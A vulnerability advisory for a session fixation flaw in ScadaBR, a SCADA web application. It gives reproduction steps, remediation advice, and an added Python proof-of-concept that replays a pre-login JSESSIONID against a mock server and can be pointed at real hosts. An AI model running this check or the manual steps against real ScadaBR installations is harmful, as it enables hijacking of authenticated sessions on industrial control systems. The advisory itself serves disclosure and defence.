CVE-2025-70973: Session Fixation in ScadaBR (JSESSIONID Not Regenerated After Login)

Description

ScadaBR runs on Java/Tomcat and issues its HTTP session cookie (JSESSIONID) before authentication; the identifier is not regenerated when a user logs in successfully. Because the pre-authentication session identifier simply becomes the authenticated session once the victim logs in, an attacker who knows the victim's JSESSIONID before login can present that same value from another browser or client and reach authenticated resources. The attacker does not need the victim's credentials, only the cookie value the victim will use when logging in.

This is a session fixation vulnerability (CWE-384).

Affected Product(s) / Version(s)

  • ScadaBR 1.12.4 (tested) image
  • ScadaBR 0.9 (default installation)
  • ScadaBR 1.0CE (tested)
  • ScadaBR Virtual Machine image referenced by OpenPLC documentation (tested)

Steps to Reproduce (PoC)

  1. Open Browser A and visit:
    • http://<target>:<port>/ScadaBR/watch_list.shtm
    • You will be redirected to http://<target>:<port>/ScadaBR/login.htm
  2. In Browser A, capture the pre-auth session cookie from developer tools/storage:
    • JSESSIONID=<valueA>
  3. Open Browser B and visit:
    • http://<target>:<port>/ScadaBR/login.htm (or any page that redirects to the login page)
  4. In Browser B, overwrite its JSESSIONID cookie with the value from Browser A:
    • Set JSESSIONID=<valueA>
  5. In Browser A, log in with valid credentials.
  6. In Browser B (without logging in), request an authenticated page such as:
    • http://<target>:<port>/ScadaBR/watch_list.shtm
  7. Observe that Browser B can access authenticated content while Browser A remains logged in.
  8. Log out from Browser A and confirm Browser B access stops.

Impact

Successful exploitation allows an attacker to hijack an authenticated ScadaBR session if they can obtain the victim’s pre-authentication session ID. This can result in unauthorized access to SCADA monitoring pages and other authenticated functionality until logout or session expiration.

Mitigation / Remediation

  • Regenerate the session identifier upon successful authentication: call request.changeSessionId() (Servlet 3.1+, keeps session attributes) or invalidate the pre-auth session and create a new one after login, copying over any attributes that must survive. Note that Tomcat's changeSessionIdOnAuthentication setting only covers container-managed authentication, not an application's own login form, so the regeneration has to happen in application code.
  • Ensure cookies are set with appropriate flags (HttpOnly, Secure with HTTPS, and SameSite where applicable). These reduce the ways an attacker can read or plant the cookie but do not fix the fixation itself.
  • Enforce HTTPS to reduce the risk of session theft on the network.
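The following script is an added example, not part of the advisory or of ScadaBR. It automates the Browser A / Browser B steps above as a reusable check and runs them against a small in-process stand-in for ScadaBR's login flow, once in the vulnerable form (same JSESSIONID kept after login) and once with the remediation applied (fresh identifier issued on login, the behaviour of request.changeSessionId()). The stand-in, its credentials (admin/admin), and the login form field names username/password are constructed assumptions; only the paths /ScadaBR/login.htm and /ScadaBR/watch_list.shtm come from the advisory. The same session_fixation_check() can be pointed at a real host and port, adjusting the form fields to the actual login form.

```python
import http.client
import http.server
import secrets
import threading
import urllib.parse

LOGIN = "/ScadaBR/login.htm"            # paths from the advisory
PROTECTED = "/ScadaBR/watch_list.shtm"
VALID_USER = ("admin", "admin")          # constructed credentials, mock only


class MockScadaBR(http.server.BaseHTTPRequestHandler):
    """Constructed stand-in for a Tomcat app: JSESSIONID is issued before auth and,
    unless regenerate_on_login is set, kept unchanged after a successful login (CWE-384)."""
    regenerate_on_login = False
    sessions = {}                        # JSESSIONID -> {"user": name or None}

    def log_message(self, *args):        # keep the demo quiet
        pass

    def _session_id(self):
        """JSESSIONID from the Cookie header, or a new pre-auth session (Tomcat-like)."""
        for part in self.headers.get("Cookie", "").split(";"):
            name, _, value = part.strip().partition("=")
            if name == "JSESSIONID" and value in self.sessions:
                return value
        sid = secrets.token_hex(16)
        self.sessions[sid] = {"user": None}
        return sid

    def _reply(self, status, body, sid, location=None):
        self.send_response(status)
        self.send_header("Set-Cookie", f"JSESSIONID={sid}; Path=/ScadaBR; HttpOnly")
        if location:
            self.send_header("Location", location)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(body.encode())

    def do_GET(self):
        sid = self._session_id()
        path = urllib.parse.urlparse(self.path).path
        if path == LOGIN:
            self._reply(200, "login form", sid)
        elif path == PROTECTED and self.sessions[sid]["user"]:
            self._reply(200, "watch list for " + self.sessions[sid]["user"], sid)
        elif path == PROTECTED:
            self._reply(302, "", sid, location=LOGIN)     # unauthenticated -> login
        else:
            self._reply(404, "not found", sid)

    def do_POST(self):
        sid = self._session_id()
        raw = self.rfile.read(int(self.headers.get("Content-Length", 0))).decode()
        form = urllib.parse.parse_qs(raw)
        creds = (form.get("username", [""])[0], form.get("password", [""])[0])
        if self.path != LOGIN or creds != VALID_USER:
            self._reply(401, "bad credentials", sid)
            return
        if self.regenerate_on_login:
            # The fix: retire the pre-auth id and bind the login to a fresh one
            # (what request.changeSessionId() achieves in the Servlet API).
            del self.sessions[sid]
            sid = secrets.token_hex(16)
            self.sessions[sid] = {"user": None}
        self.sessions[sid]["user"] = creds[0]
        self._reply(302, "", sid, location=PROTECTED)


def start_mock(regenerate_on_login):
    """Serve the stand-in on a free loopback port; port is server_address[1]."""
    MockScadaBR.regenerate_on_login = regenerate_on_login
    MockScadaBR.sessions = {}
    srv = http.server.HTTPServer(("127.0.0.1", 0), MockScadaBR)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def request(host, port, method, path, sid=None, body=None):
    """One exchange without redirect following; the cookie is set by hand so a chosen
    JSESSIONID can be replayed. Returns (status, JSESSIONID from Set-Cookie or None)."""
    headers = {"Cookie": f"JSESSIONID={sid}"} if sid else {}
    if body is not None:
        headers["Content-Type"] = "application/x-www-form-urlencoded"
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request(method, path, body=body, headers=headers)
    resp = conn.getresponse()
    resp.read()
    conn.close()
    new_sid = None
    for part in (resp.getheader("Set-Cookie") or "").split(";"):
        name, _, value = part.strip().partition("=")
        if name == "JSESSIONID":
            new_sid = value
    return resp.status, new_sid


def session_fixation_check(host, port, username, password):
    """Replays the PoC. True if Browser A's pre-auth JSESSIONID, handed to Browser B,
    still reaches authenticated content after Browser A logs in."""
    status, sid_a = request(host, port, "GET", PROTECTED)          # steps 1-2
    if status != 302 or not sid_a:
        raise RuntimeError(f"unexpected pre-auth response {status}")
    # Steps 3-5: Browser B adopts sid_a; Browser A logs in using that same cookie.
    form = urllib.parse.urlencode({"username": username, "password": password}).encode()
    status, sid_after = request(host, port, "POST", LOGIN, sid=sid_a, body=form)
    if status not in (200, 302):
        raise RuntimeError(f"login failed with status {status}")
    status_b, _ = request(host, port, "GET", PROTECTED, sid=sid_a)  # steps 6-7
    vulnerable = status_b == 200
    print(f"id after login {'unchanged' if sid_after in (None, sid_a) else 'regenerated'}; "
          f"pre-auth id {'still works' if vulnerable else 'rejected'}: "
          f"{'VULNERABLE' if vulnerable else 'not vulnerable'}")
    return vulnerable


if __name__ == "__main__":
    for regen in (False, True):           # vulnerable form first, then with the fix
        srv = start_mock(regen)
        session_fixation_check("127.0.0.1", srv.server_address[1], *VALID_USER)
        srv.shutdown()
```

Against the vulnerable stand-in the pre-auth identifier is accepted after login and the check reports VULNERABLE; with regeneration enabled the identifier the attacker holds no longer maps to any session, so Browser B is bounced back to the login page. The check deliberately ignores the cookie returned by the login response and replays only the original value, which is exactly what a fixed cookie in the victim's browser would do.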

Credits

Discovered by Chiranjib Mohapatra, Raja Kulukuri, Divya Bridgit Tomy, Teja Sai Hanish Gudepu, Jan 2026.

References